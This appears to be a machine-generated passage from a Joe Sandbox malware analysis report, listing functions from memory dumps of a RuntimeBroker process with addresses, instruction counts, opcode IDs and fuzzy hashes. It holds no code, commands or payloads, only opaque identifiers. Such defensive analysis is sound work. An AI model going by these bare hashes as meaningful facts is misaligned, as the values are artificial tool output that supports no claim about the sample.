                                                                                                                            • Opcode Fuzzy Hash: 705079fe517541d76ecad84fcd9d4aaea75855e4cd7e02e019e3b88bec33d416
                                                                                                                            • Instruction Fuzzy Hash: 63018035A0E38D8FEB22DB6488A409C7FB0EF42704F1642E7C044DB1B2D9745A458781
                                                                                                                            Function 00007FFD9B770C50 Relevance: .0, Instructions: 37COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b770000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f12b5d40e15d30b3c7567b514f8353928e30d919310705de18cf6061e21b3d11
                                                                                                                            • Instruction ID: c3b3881d58bdaed6639923588d9662b14198dbe221c6468a1f7c26fc4a4c7749
                                                                                                                            • Opcode Fuzzy Hash: f12b5d40e15d30b3c7567b514f8353928e30d919310705de18cf6061e21b3d11
                                                                                                                            • Instruction Fuzzy Hash: D2017134A0E38D9FEB22DBA488A40AC7FB0EF02704F1542E7C044DB1A2D9785B448741
                                                                                                                            Function 00007FFD9B775E02 Relevance: .0, Instructions: 35COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b770000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: abcd8d7b5a1ac96785ef358f5a3807d9935d5c80a09c5556c3885845ceedd252
                                                                                                                            • Instruction ID: 6ba1e4413134e14b88d0c4a02d64cc9babf19dee79bd0ee249656c25d18838e5
                                                                                                                            • Opcode Fuzzy Hash: abcd8d7b5a1ac96785ef358f5a3807d9935d5c80a09c5556c3885845ceedd252
                                                                                                                            • Instruction Fuzzy Hash: D7F0C231648A098FCB54DF04C894FA973B1FB98311F1586A9D00ED7260DA74AA85DF81
                                                                                                                            Function 00007FFD9B7AA9D9 Relevance: .0, Instructions: 35COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b7a1000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2e93ddc73d22e045b98ffa9fbde4d4c6305cb459faf0eb794fc24b4078d63b44
                                                                                                                            • Instruction ID: 7c018c43a5b5f31a15d509bdb55ec2301cf10e70a0bbc43cfc3a5dcb3419bdcc
                                                                                                                            • Opcode Fuzzy Hash: 2e93ddc73d22e045b98ffa9fbde4d4c6305cb459faf0eb794fc24b4078d63b44
                                                                                                                            • Instruction Fuzzy Hash: 11F0E520B5DBC40FC71A562958654617BE1CF5B20534A41FBD496CB2A3DD18AC858351
                                                                                                                            Function 00007FFD9B784B7A Relevance: .0, Instructions: 33COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b780000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f747cd76a50f8eaafc175bb5992f446a053f3789100cc4f1f6c70f3d0c472a88
                                                                                                                            • Instruction ID: de72f77963f0d7beba38f079d2671fa8fed41b6bfdc177926d06d5362d1013dd
                                                                                                                            • Opcode Fuzzy Hash: f747cd76a50f8eaafc175bb5992f446a053f3789100cc4f1f6c70f3d0c472a88
                                                                                                                            • Instruction Fuzzy Hash: FDF0E930B0DA1F4BFAB4AA8894E06F83350EF54711F030378D40AC31BBDDB8AA0242D5
                                                                                                                            Function 00007FFD9B7AB7B0 Relevance: .0, Instructions: 32COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b7a1000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ea6ef492e8971a59f1178141e891dab85f80a7afa77e182f4b69d2d3da8c5637
                                                                                                                            • Instruction ID: cca73bea72c49882727d0e73a22037cb80d2bc8f69be5c4d75b1d8fc7f531ff6
                                                                                                                            • Opcode Fuzzy Hash: ea6ef492e8971a59f1178141e891dab85f80a7afa77e182f4b69d2d3da8c5637
                                                                                                                            • Instruction Fuzzy Hash: 6FF0E527B586110FD709BB3CE8B68F83390DF5622574880F6E04ECE1E7DE19D848CA91
                                                                                                                            Function 00007FFD9B774938 Relevance: .0, Instructions: 30COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b770000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c4f5a238d5ff1a25da4fe89895f093be7c6c75441b6832ed76e2f015c1f7fad4
                                                                                                                            • Instruction ID: c596e8eb979849a1c688b8d7c431976f28b35389cf7d55e41d1a200e2b13aece
                                                                                                                            • Opcode Fuzzy Hash: c4f5a238d5ff1a25da4fe89895f093be7c6c75441b6832ed76e2f015c1f7fad4
                                                                                                                            • Instruction Fuzzy Hash: A3F0EC31F1E95A4BF765D65888F556C3252EB44700F4503B5D40ECB2FBDD5C2E0686C2
                                                                                                                            Function 00007FFD9B79CB49 Relevance: .0, Instructions: 30COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B793000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B793000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b793000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a123afa1ca69b8980483e2dd3c5d9ab8c7cf09c7b5b341619b25232fcfde3019
                                                                                                                            • Instruction ID: 180ed87ecabefda53d6dcc809420346651914ed0995ba6a28356068667271586
                                                                                                                            • Opcode Fuzzy Hash: a123afa1ca69b8980483e2dd3c5d9ab8c7cf09c7b5b341619b25232fcfde3019
                                                                                                                            • Instruction Fuzzy Hash: 63F06D6096D7C44FC702AB388C644257FF0EF1710978A02FBD4CACB5B3D619884AC352
                                                                                                                            Function 00007FFD9B7A1A49 Relevance: .0, Instructions: 29COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b7a1000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a225168d145c6a3f9c7d0165b7abb1b6ac2a4f7370f62b19437598dec2086448
                                                                                                                            • Instruction ID: 68bded119260a7472f5980c6564b9c35858fbfa14f8d25f5c601ca03c71fc363
                                                                                                                            • Opcode Fuzzy Hash: a225168d145c6a3f9c7d0165b7abb1b6ac2a4f7370f62b19437598dec2086448
                                                                                                                            • Instruction Fuzzy Hash: DDE0D830B557884FC70D97388869660BBF1EF67215B8512EAC046C7193EE2CDC8ACB41
                                                                                                                            Function 00007FFD9B7A2CE9 Relevance: .0, Instructions: 29COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b7a1000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0d386efdce39d2d9bf99b7990a1713edcd406c281a1d862965821d5a785ecea0
                                                                                                                            • Instruction ID: 8e4f3b181c224f1467284a3e2a6dbbf8cd47948a7ca8f792a828f5c849745a3d
                                                                                                                            • Opcode Fuzzy Hash: 0d386efdce39d2d9bf99b7990a1713edcd406c281a1d862965821d5a785ecea0
                                                                                                                            • Instruction Fuzzy Hash: C3E0922070ABC80FCB0E963848685617FA1EFA610178942EBC445CF2E3D919DC89C751
                                                                                                                            Function 00007FFD9B79E279 Relevance: .0, Instructions: 29COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B793000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B793000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b793000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c8a0342073d1d5f2e26010385ed0553ffe0bfa7399c59657db82172c6a1b1bcf
                                                                                                                            • Instruction ID: 0af3c12ac68d2e0ee6e7c6bc870f791d782949f45d5bd20fdf75bf4dd5e0ecbb
                                                                                                                            • Opcode Fuzzy Hash: c8a0342073d1d5f2e26010385ed0553ffe0bfa7399c59657db82172c6a1b1bcf
                                                                                                                            • Instruction Fuzzy Hash: 6EE09220B597C40FCB0E963848645607FA1EF5710178952FAC446CF293E919DC89C751
                                                                                                                            Function 00007FFD9B7A79D5 Relevance: .0, Instructions: 28COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b7a1000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1f1b36cf6e6d68fd3653b6a98a1aa01873a78dde0981d82731e6bbd0d9db0483
                                                                                                                            • Instruction ID: 00c8d62409973b2cbb5bda6e6272c2f8dec1ac9a30e7e00c547bfb4a315568b1
                                                                                                                            • Opcode Fuzzy Hash: 1f1b36cf6e6d68fd3653b6a98a1aa01873a78dde0981d82731e6bbd0d9db0483
                                                                                                                            • Instruction Fuzzy Hash: 6DE09222B0E7845FD31A1A384CB58683B91CF6B22675B01A7E05ACB6F7D8159D49C312
                                                                                                                            Function 00007FFD9B7AAA69 Relevance: .0, Instructions: 26COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b7a1000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2128a249a3082fa369c4209621e00c132a33cfd3915ae748e11614d1f3635339
                                                                                                                            • Instruction ID: d5295df65151fce8769a7bab2f7eb8935fa07a0569c48a721c1772dfd4730035
                                                                                                                            • Opcode Fuzzy Hash: 2128a249a3082fa369c4209621e00c132a33cfd3915ae748e11614d1f3635339
                                                                                                                            • Instruction Fuzzy Hash: 25E08620A59B844FC70EA73888A59503FB0DF6B11178A40EAD049CF1B3D51DDC49C721
                                                                                                                            Function 00007FFD9B7A7989 Relevance: .0, Instructions: 24COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b7a1000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e97a9871ac4c28017fa7e5585a21dd974af1023d2aa243e16608aac2c01e2fee
                                                                                                                            • Instruction ID: 8a8f38af44ecd72405eacfd701a7c420039f8cc15eb0c893d0f0866ff1650f58
                                                                                                                            • Opcode Fuzzy Hash: e97a9871ac4c28017fa7e5585a21dd974af1023d2aa243e16608aac2c01e2fee
                                                                                                                            • Instruction Fuzzy Hash: 6AE01A2194F7C04FC75B9B3588A88447F71AE1721074A51EBC085CF5B3EA299849C712
                                                                                                                            Function 00007FFD9B7AD959 Relevance: .0, Instructions: 23COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b7a1000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9de3e133e8a0299639a16cb5a42a04c4396c28f77a96a9b3cfa72275a9a02c0b
                                                                                                                            • Instruction ID: d31123e7703c612971cdfbbacc5dee12710d76487b53f1767c2ac97645d5b6fc
                                                                                                                            • Opcode Fuzzy Hash: 9de3e133e8a0299639a16cb5a42a04c4396c28f77a96a9b3cfa72275a9a02c0b
                                                                                                                            • Instruction Fuzzy Hash: 61E04F2164A7C04FC70E963488658543FA09F6711178A40EBC045CF2B3D519D848C712
                                                                                                                            Function 00007FFD9B771DC0 Relevance: .0, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b770000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ff3051ce8f092a69e22551edfefc58e64b516ddd8f195051f1ddaf51897b9e82
                                                                                                                            • Instruction ID: 6eef2b9101f286c0de708749734b3c87a9ab1d86c77e91a95aca8fc206b80839
                                                                                                                            • Opcode Fuzzy Hash: ff3051ce8f092a69e22551edfefc58e64b516ddd8f195051f1ddaf51897b9e82
                                                                                                                            • Instruction Fuzzy Hash: 6BE01274F0D51E87FB64E284C8A17F97265EB84700F150278D91ED33E1CD68AE418755
                                                                                                                            Function 00007FFD9B7AA540 Relevance: .0, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b7a1000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                            • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                            • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                            • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                            Function 00007FFD9B7AA4B0 Relevance: .0, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b7a1000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                            • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                            • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                            • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                            Function 00007FFD9B7AD8D9 Relevance: .0, Instructions: 21COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b7a1000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ff668b0921acf4aec1df53d3771bbbee280d74b70dea2e50d2edbea61b88e1de
                                                                                                                            • Instruction ID: 4f9a446d7cafa3e9053c5d41883d5741ab71af8c638540dd15ad42138fdc29be
                                                                                                                            • Opcode Fuzzy Hash: ff668b0921acf4aec1df53d3771bbbee280d74b70dea2e50d2edbea61b88e1de
                                                                                                                            • Instruction Fuzzy Hash: 97E04F2194F7C04FC74B973488B88447F60DE1721078A41EAC085CF5B3EA1EC849C701
                                                                                                                            Function 00007FFD9B7ACC29 Relevance: .0, Instructions: 20COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b7a1000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 15d5b711b6787fe2596d9f7a8e9a4c595ccb5cfcd9163111d0bb6ba391062da5
                                                                                                                            • Instruction ID: db2287d7c294e146d138765a9196c29d228660edbcdae115d73e10372a712d8d
                                                                                                                            • Opcode Fuzzy Hash: 15d5b711b6787fe2596d9f7a8e9a4c595ccb5cfcd9163111d0bb6ba391062da5
                                                                                                                            • Instruction Fuzzy Hash: FEE0EC2154E7C44FC70A9B3488A59943FB0AF2711178A41EAC449CF5B3D6599C88C762
                                                                                                                            Function 00007FFD9B7A1AF0 Relevance: .0, Instructions: 18COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b7a1000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                            • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                                                            • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                            • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                                                            Function 00007FFD9B7AB7D8 Relevance: .0, Instructions: 17COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b7a1000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 326fddfa3e6338c3e5d2f0e00ff13dfa1b6452360b5d368467cabd64d0f95c06
                                                                                                                            • Instruction ID: e0e5915107962139cbaca62c5eb9a2f17f2cc8789a970f78f0fcf3a2fb63c43b
                                                                                                                            • Opcode Fuzzy Hash: 326fddfa3e6338c3e5d2f0e00ff13dfa1b6452360b5d368467cabd64d0f95c06
                                                                                                                            • Instruction Fuzzy Hash: 88D02230B50A040FC70CA63C8C588707390EBAE20278100A8D00BC72B1D92ADC89C740
                                                                                                                            Function 00007FFD9B7A6F10 Relevance: .0, Instructions: 17COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b7a1000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                                                                                            • Instruction ID: 59d7eb29e2d82ea2b3e44cc7a41acb37300601675781a962b97543d00d943001
                                                                                                                            • Opcode Fuzzy Hash: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                                                                                            • Instruction Fuzzy Hash: A1D01234B519044FC71CA63C88998747391EB6A216BD541A9D00AC72B5E96ADD89C741
                                                                                                                            Function 00007FFD9B770D34 Relevance: .0, Instructions: 15COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b770000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                            • Instruction ID: af6b9e6b75b6f4d44527ea7727e4b1347e76f90f0f256e63133c3acbb990fd7b
                                                                                                                            • Opcode Fuzzy Hash: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                            • Instruction Fuzzy Hash: 8CE01234B0930ECBEB10DB94C4D86ED7761EB51711F104765C401872E9DAB86784CA80
                                                                                                                            Function 00007FFD9B7A25E9 Relevance: .0, Instructions: 15COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b7a1000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: fecf705be57bf4b63f817873ae5d26a0b5a7b3d16bad287b69f808cfeb592bb7
                                                                                                                            • Instruction ID: 7d6acbb3f5004d86c07ecfd6bbfbb74f00acfdab622a67d5fff2d60ec49ef3d1
                                                                                                                            • Opcode Fuzzy Hash: fecf705be57bf4b63f817873ae5d26a0b5a7b3d16bad287b69f808cfeb592bb7
                                                                                                                            • Instruction Fuzzy Hash: 06D05E61F0DA4A8BF6A4EBA88472B697282AF64340F0506B6A05D831F3CC1879804781
                                                                                                                            Function 00007FFD9B7882FE Relevance: .0, Instructions: 15COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b780000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e746061befa3360e6d6d7cfca77cb91bc8633c53169afd72dc777b8a19368c7c
                                                                                                                            • Instruction ID: 4ca44f8eacc907ae6cdd9677d211da82e9ab53677971fc2b1005e94d42dccd87
                                                                                                                            • Opcode Fuzzy Hash: e746061befa3360e6d6d7cfca77cb91bc8633c53169afd72dc777b8a19368c7c
                                                                                                                            • Instruction Fuzzy Hash: 6CE0EC30E09A2ECAEBB09B54C8947AC72B2BB08301F9503F5C40DA31A5CB796E819B51
                                                                                                                            Function 00007FFD9B7844BD Relevance: .0, Instructions: 12COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b780000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2b78f12a6ef4b72c5c767dd010bdbfff363422518cf0778111679bb89e34baca
                                                                                                                            • Instruction ID: 59c9e1ddc9aef63e09f6a57d9198b12500acaa66bc05d8892c798b8e39ac78f9
                                                                                                                            • Opcode Fuzzy Hash: 2b78f12a6ef4b72c5c767dd010bdbfff363422518cf0778111679bb89e34baca
                                                                                                                            • Instruction Fuzzy Hash: 7ED09E70E2891ECEEB58EF94C875ABD76B1BF44304F400175E42A972DADF7829018740

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00007FFD9B7806FA Relevance: 9.0, Strings: 7, Instructions: 222COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b780000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: =M_^$M_^%$M_^($M_^*$M_^+$M_^2$M_^4
                                                                                                                            • API String ID: 0-667470765
                                                                                                                            • Opcode ID: 0cdd75d6840911683cd9f600df7fa0b06e6b285b0f697333efa4a442bc15c2f9
                                                                                                                            • Instruction ID: 421eb76c31e958a06d09b9ffb66e23cb2caaab5cf4887949753af03d018e5044
                                                                                                                            • Opcode Fuzzy Hash: 0cdd75d6840911683cd9f600df7fa0b06e6b285b0f697333efa4a442bc15c2f9
